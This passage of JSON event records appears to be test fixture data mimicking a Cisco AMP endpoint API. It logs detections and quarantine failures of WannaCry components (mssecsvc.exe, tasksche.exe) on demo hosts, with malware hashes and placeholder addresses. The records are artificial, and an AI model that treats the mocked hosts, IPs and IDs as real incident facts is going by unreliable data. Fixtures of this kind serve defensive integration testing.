Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine 